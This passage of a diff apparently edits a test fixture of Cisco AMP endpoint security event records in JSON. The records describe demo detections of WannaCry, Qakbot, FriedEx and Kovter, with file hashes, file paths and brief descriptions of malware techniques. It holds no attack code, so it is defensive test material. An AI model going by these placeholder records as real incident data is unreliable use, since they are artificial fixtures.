Quarantined","event_type_id":553648143,"detection_id":"6419179204872503299","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":957000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179209167470598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":894000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3020,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583840597369422000,"timestamp":1610621973,"timestamp_nanoseconds":231000000,"date":"2021-01-14T10:59:33+00:00","event_type":"Malicious Activity 
Detection","event_type_id":1090519105,"detection":"W32.MAP.Ransomware.rewrite","detection_id":"6583840593074454529","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mscorsvw.exe","file_path":"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0","sha1":"c78f4c22dd195a1791472a2c271a0c85b53900d9","md5":"75a758a0c5cea48c9922d64a113d0f9d"},"parent":{"process_id":480,"disposition":"Clean","file_name":"services.exe","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536","sha1":"ff658a36899e43fec3966d608b4aa4472de7a378","md5":"71c85477df9347fe8e7bc55768473fca"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6701398782847286000,"timestamp":1610621970,"timestamp_nanoseconds":182000000,"date":"2021-01-14T10:59:30+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621970,"start_date":"2021-01-14T10:59:30+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"file:///C%3A/Windows/SysWOW64/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Malicious","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136036637603000,"timestamp":1610621707,"timestamp_nanoseconds":260000000,"date":"2021-01-14T10:55:07+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621707,"start_date":"2021-01-14T10:55:07+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"file:///C%3A/Windows/system32/cmd.exe","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"},"parent":{"disposition":"Clean","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066250000100,"timestamp":1610621237,"timestamp_nanoseconds":250000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066228000300,"timestamp":1610621237,"timestamp_nanoseconds":228000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} \ No newline at end of file +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":459000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204901661835279","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":443000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":69000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204901661835276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":6000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204897366867979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419204897366867971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411462918168117251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462918168117000,"timestamp":1610629065,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:57:45+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12","md5":"a97fb86da4e010974860e5024137b56b"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective 
